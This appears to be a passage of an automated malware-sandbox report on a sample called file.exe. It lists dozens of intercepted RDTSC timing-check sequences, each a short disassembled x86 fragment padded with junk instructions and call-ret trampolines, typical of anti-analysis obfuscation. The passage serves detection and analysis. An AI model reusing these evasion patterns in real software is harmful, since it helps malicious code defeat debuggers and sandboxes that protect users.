                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71879C second address: 718833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E43h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, B2F7h 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D3700h] 0x0000001a push CF2C7F56h 0x0000001f jmp 00007FCA94C93E3Dh 0x00000024 add dword ptr [esp], 30D3812Ah 0x0000002b mov si, 2FFCh 0x0000002f push 00000003h 0x00000031 mov dx, 6C48h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push eax 0x0000003a call 00007FCA94C93E38h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc eax 0x0000004d push eax 0x0000004e ret 0x0000004f pop eax 0x00000050 ret 0x00000051 ja 00007FCA94C93E3Ch 0x00000057 mov ecx, esi 0x00000059 push 00000003h 0x0000005b mov dword ptr [ebp+122D17EFh], eax 0x00000061 push C0CF035Ch 0x00000066 jl 00007FCA94C93E4Bh 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718911 second address: 718915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718915 second address: 71891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71891F second address: 718923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718B2B second address: 718B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCA94C93E3Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70775B second address: 707761 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736F87 second address: 736F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737262 second address: 73726C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73726C second address: 73727C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94C93E3Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737808 second address: 73780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737936 second address: 73794D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA94C93E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jbe 00007FCA94C93E36h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737D97 second address: 737D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737D9D second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711770 second address: 711777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73804C second address: 73805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007FCA94C93E3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73805D second address: 738063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738063 second address: 738068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738068 second address: 738089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FCA9461846Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F2B5 second address: 73F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F2B9 second address: 73F2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73E873 second address: 73E877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74454D second address: 744566 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FCA94618468h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744703 second address: 744709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744C38 second address: 744C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744DF7 second address: 744E27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FCA94C93E42h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FCA94C93E3Dh 0x00000018 popad 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744F9C second address: 744FB8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94618466h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FCA9461846Ah 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744FB8 second address: 744FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746F85 second address: 746F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746F8E second address: 746F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746F92 second address: 746FFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007FCA94618477h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FCA9461846Eh 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e jmp 00007FCA94618478h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FCA94618472h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746FFE second address: 747003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747720 second address: 747768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FCA94618477h 0x0000000f jmp 00007FCA94618471h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA94618470h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747768 second address: 747772 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747772 second address: 747779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747832 second address: 747850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E49h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747850 second address: 747856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74804C second address: 748052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1DC second address: 74A1F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94618468h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74A1F1 second address: 74A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749A00 second address: 749A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA9461846Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C361 second address: 74C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B591 second address: 74B596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C366 second address: 74C36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C36C second address: 74C370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750AAA second address: 750AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750AB0 second address: 750AC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jnp 00007FCA9461846Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A58 second address: 751A6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA94C93E38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A6A second address: 751A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A70 second address: 751A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A75 second address: 751A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751A7B second address: 751A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752984 second address: 752A16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618476h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCA94618471h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FCA94618468h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D36A0h] 0x00000032 push 00000000h 0x00000034 mov ebx, eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FCA94618468h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 sub edi, 278B471Fh 0x00000058 push eax 0x00000059 push edi 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FCA94618473h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7548C0 second address: 7548CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751C36 second address: 751CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCA94618468h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jno 00007FCA9461846Ch 0x0000002b push dword ptr fs:[00000000h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FCA94618468h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xor bx, CEABh 0x00000051 mov dword ptr fs:[00000000h], esp 0x00000058 mov edi, dword ptr [ebp+122D18DEh] 0x0000005e mov eax, dword ptr [ebp+122D0929h] 0x00000064 mov edi, dword ptr [ebp+122D3748h] 0x0000006a push FFFFFFFFh 0x0000006c mov di, dx 0x0000006f nop 0x00000070 jmp 00007FCA9461846Eh 0x00000075 push eax 0x00000076 push ebx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BBF second address: 752BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753AB4 second address: 753ABE instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA9461846Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7549E4 second address: 754A0A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94C93E49h 0x00000008 jmp 00007FCA94C93E43h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BC3 second address: 752BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 753ABE second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ebx, ax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FCA94C93E38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D35FEh], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007FCA94C93E3Fh 0x0000003f mov eax, dword ptr [ebp+122D0A2Dh] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FCA94C93E38h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f jno 00007FCA94C93E37h 0x00000065 mov bx, FDB2h 0x00000069 push FFFFFFFFh 0x0000006b xor dword ptr [ebp+122D31ADh], esi 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FCA94C93E48h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75663A second address: 75663F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754A0A second address: 754A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BC9 second address: 752BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FCA94618466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7566D6 second address: 7566E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BD4 second address: 752C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bl, A9h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov ebx, dword ptr [ebp+12475B95h] 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or edi, 046BF531h 0x00000024 mov eax, dword ptr [ebp+122D0619h] 0x0000002a sub edi, 2FA68224h 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FCA94618468h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c and edi, 50A68970h 0x00000052 mov ebx, dword ptr [ebp+122D374Ch] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007FCA9461846Ch 0x00000061 jp 00007FCA94618466h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756817 second address: 75682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA94C93E36h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75789C second address: 7578A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75682A second address: 756830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756830 second address: 75683A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCA94618466h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7578A0 second address: 757936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, 7705h 0x00000017 mov edi, 46D47A92h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 sub dword ptr [ebp+122D1AE6h], eax 0x00000029 pushad 0x0000002a jmp 00007FCA94C93E47h 0x0000002f jbe 00007FCA94C93E38h 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp+122D0F15h] 0x0000003c jne 00007FCA94C93E3Ch 0x00000042 push FFFFFFFFh 0x00000044 mov ebx, dword ptr [ebp+122D39B0h] 0x0000004a pushad 0x0000004b ja 00007FCA94C93E38h 0x00000051 mov ecx, ebx 0x00000053 sub al, 00000003h 0x00000056 popad 0x00000057 nop 0x00000058 pushad 0x00000059 push edi 0x0000005a pushad 0x0000005b popad 0x0000005c pop edi 0x0000005d pushad 0x0000005e push edi 0x0000005f pop edi 0x00000060 push edx 0x00000061 pop edx 0x00000062 popad 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jnc 00007FCA94C93E36h 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A61C second address: 75A638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618478h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757936 second address: 75793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D78A second address: 75D791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C94E second address: 75C954 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D791 second address: 75D7F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA9461846Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1D59h], edx 0x00000013 mov ebx, dword ptr [ebp+122D1B00h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d mov di, ax 0x00000020 call 00007FCA94618470h 0x00000025 call 00007FCA94618477h 0x0000002a pop ebx 0x0000002b pop ebx 0x0000002c xchg eax, esi 0x0000002d jnc 00007FCA94618470h 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C954 second address: 75C96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D7F6 second address: 75D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75D801 second address: 75D805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75E8D8 second address: 75E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCA94618466h 0x0000000a popad 0x0000000b jnp 00007FCA9461846Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75F8EB second address: 75F90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007FCA94C93E36h 0x00000014 jmp 00007FCA94C93E3Dh 0x00000019 popad 0x0000001a rdtsc
